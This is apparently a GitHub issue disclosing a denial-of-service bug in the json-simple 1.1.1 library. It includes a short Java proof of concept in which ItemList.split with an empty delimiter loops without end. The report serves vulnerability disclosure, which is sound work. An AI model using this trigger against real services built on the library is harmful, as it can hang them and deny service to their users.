ItemList is vulnerable to out of denial of service (DoS) attack

# Description

If an object of ItemList splits a string into multiple parts based on an empty delimiter, it will cause a denial of service attack.


# Version

```
        <dependency>
            <groupId>com.googlecode.json-simple</groupId>
            <artifactId>json-simple</artifactId>
            <version>1.1.1</version>
        </dependency>
```

# PoC

```
import org.junit.runner.RunWith;
import java.util.ArrayList;
import java.util.List;
import org.json.simple.*;

public class ItemListFuzzerTest1 {

    private ItemList itemList;

    public static void main(String args[]) {
        ItemList itemList = new ItemList();
        List append = new ArrayList();
        itemList.split("aaaaaa", "", append, false);
    }

}

```

# Result

Above code snippet will run without termination.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

ItemList is vulnerable to out of denial of service (DoS) attack #160

Description

Version

PoC

Result

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

ItemList is vulnerable to out of denial of service (DoS) attack #160

Description

Description

Version

PoC

Result

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions